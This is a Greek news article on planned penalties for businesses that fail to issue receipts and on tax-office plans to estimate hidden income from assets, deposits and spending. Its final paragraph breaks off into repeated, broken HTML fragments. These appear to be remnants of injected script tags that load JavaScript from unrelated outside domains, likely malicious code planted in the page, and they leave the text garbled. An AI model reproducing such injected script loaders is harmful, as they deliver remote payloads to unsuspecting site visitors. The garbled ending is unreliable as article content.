Διαχωρίζονται από τον ΦΠΑ οι ποινές για μη έκδοση αποδείξεων

https://www.efsyn.gr/sites/efsyn.gr/files/wysiwyg/eforia_0.jpg

Η Εφορία θα προσδιορίζει τα πραγματικά εισοδήματα των φορολογουμένων με έμμεσο τρόπο
Την περσινή γκάφα του υπουργείου Οικονομικών με τα φορολογικά πρόστιμα, από τα οποία γλίτωναν όσες επιχειρήσεις και ελεύθεροι επαγγελματίες δεν υπάγονταν σε καθεστώς ΦΠΑ, επιχειρεί να διορθώσει η Γενική Γραμματεία Δημοσίων Εσόδων.

Με το νέο ποινολόγιο που προωθείται θα επιβάλλονται πρόστιμα σε όλες τις ομάδες των επαγγελματιών, όπως γιατροί, φροντιστήρια, ιδιωτικά εκπαιδευτήρια και μικρές επιχειρήσεις με ετήσια ακαθάριστα έσοδα μέχρι 10.000 ευρώ, στις οποίες εξαιτίας της εξαίρεσής τους από τον ΦΠΑ δεν έχουν εφαρμογή τα πρόστιμα.

Ολα ξεκίνησαν με τον τελευταίο φορολογικό νόμο, ο οποίος προβλέπει πρόστιμα με βάση τον ΦΠΑ (το 50% του ΦΠΑ που δεν αποδόθηκε) για όσους δεν κόβουν αποδείξεις. Αποτέλεσμα τούτου είναι οι ελεγκτές, σε περίπτωση διαπίστωσης αυτής της παράβασης, να μην μπορούν να κάνουν τίποτα περισσότερο από μια απλή καταγραφή στο μπλοκάκι τους.

Με νεότερη διάταξη θα επαναφέρονται, πιθανότατα, τα αυτοτελή πρόστιμα που ίσχυαν για όλες αυτές τις περιπτώσεις επαγγελματιών των οποίων σήμερα η Εφορία χαϊδεύει τα αυτιά.

Παράλληλα, εξετάζονται αυστηρότερες ποινές για όσους στέκονται εμπόδιο στον φορολογικό έλεγχο ή συλλαμβάνονται δύο φορές για παράβαση μέσα σε ένα χρόνο. Η ποινή και στις δύο περιπτώσεις θα είναι το άμεσο κλείσιμο της επιχείρησης.

Την ίδια στιγμή, τον μπελά τους με την Εφορία θα βρουν οι συστηματικοί φοροφυγάδες, όσοι δηλαδή έχουν αναγάγει σε σπορ την απόκρυψη των εισοδημάτων τους. Η φορολογική αρχή, στο πλαίσιο της εφαρμογής των μεθόδων έμμεσου προσδιορισμού της φορολογητέας ύλης (γνωστές και ως έμμεσες τεχνικές ελέγχου), θα υπολογίζει τα εισοδήματά τους με βάση τον πλούτο που διαθέτουν και τις δαπάνες που πραγματοποιούν.

Τραπεζικές καταθέσεις, ακίνητα, αυτοκίνητα, σκάφη αναψυχής, δάνεια, υποθήκες, κοσμήματα, έργα τέχνης και άλλα τιμαλφή αξίας άνω των 5.000 ευρώ θα τα χρησιμοποιούν οι ελεγκτές ως βάση υπολογισμού για το πραγματικό εισόδημα των φορολογουμένων.

Οι έμμεσες τεχνικές ελέγχου μπορεί να νομοθετήθηκαν το 2012 (με τον ν. 4079/2012), πλην όμως παραμένουν αδρανείς. Πρόκειται για ένα φορολογικό «όπλο» που ισχύει εδώ και πολλά χρόνια στο εξωτερικό. Το αντέγραψε η ελληνική φορολογική διοίκηση αλλά ποτέ δεν το αξιοποίησε μέχρι τώρα.

Ωσπου ήρθε η ώρα της νέας Ανεξάρτητης Αρχής να το αξιοποιήσει από το νέος έτος. Ηδη ο γενικός γραμματέας Γ. Πιτσιλής ετοιμάζει σχετική εγκύκλιο την οποία θα αποστείλει σε όλες τις Εφορίες, όπου θα δίνεται έμφαση στο νέο μοντέλο των φορο-ελέγχων για την αποκάλυψη και φορολόγηση των κρυφών εισοδημάτων.

Η Εφορία ακολουθώντας την αμερικανική συνταγή θα προσδιορίζει τα πραγματικά εισοδήματα των φορολογουμένων με έμμεσο τρόπο λαμβάνοντας υπόψη όλα τα έσοδα και τα έξοδα, τα περιουσιακά στοιχεία (κινητά και ακίνητα) και τις καταθέσεις στις τράπεζες.

Με βάση τα στοιχεία αυτά θα προσδιορίζονται τα φορολογητέα εισοδήματα και εφόσον αυτά υπερβαίνουν τα δηλωθέντα, τότε ο φορολογούμενος θα καλείται να πληρώσει πρόσθετο φόρο εισοδήματος και εισφορά αλληλεγγύης.

Για τον προσδιορισμό του πραγματικού εισοδήματος θα αξιοποιείται κάθε διαθέσιμο στοιχείο. Αλλωστε η Γενική Γραμματεία Πληροφορικών Συστημάτων (ΓΓΠΣ) έχει στη διάθεσή της αναλυτικά στοιχεία για τις δαπάνες όλων των φορολογουμένων σε ιδιωτικά θεραπευτήρια, εκπαιδευτήρια, ασφαλιστικές εταιρείες, δαπάνες για φως, νερό, τηλέφωνο αλλά και αναλυτικά στοιχεία για όσα χρήματα πέρασαν μέσα από το τραπεζικό σύστημα είτε υπό μορφή καταθέσεων είτε υπό μορφή δανείων ή επενδυτικών προϊόντων και μπορεί με αυτόν τον τρόπο να κάνει εύκολες διασταυρώσεις.

Εφόσον πρόκειται για επιτηδευματίες θα πραγματοποιείται ανάλυση των αγορών και των πωλήσεων με τη χρήση ενός ποσοστού περιθωρίου κέρδους, που θα το καθορίζει η Εφορία, με σκοπό να προσδιοριστούν τα ακαθάριστα εισοδήματα του φορολογούμενου.

Επιπλέον, ο ελεγκτής θα μπορεί με τις έμμεσες τεχνικές να προσδιορίσει:

■ Τον αριθμό των ειδών και την τιμή πώλησης ανά μονάδα, ιδίως στην περίπτωση που η επιχείρηση παρέχει περιορισμένα είδη προϊόντων-αγαθών, ή ορισμένου είδους υπηρεσίες.

■ Εάν οι τιμές των πωλούμενων αγαθών ή οι αμοιβές για τις παρασχεθείσες υπηρεσίες παραμένουν σταθερές καθ’ όλη τη διάρκεια της φορολογικής χρήσης.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >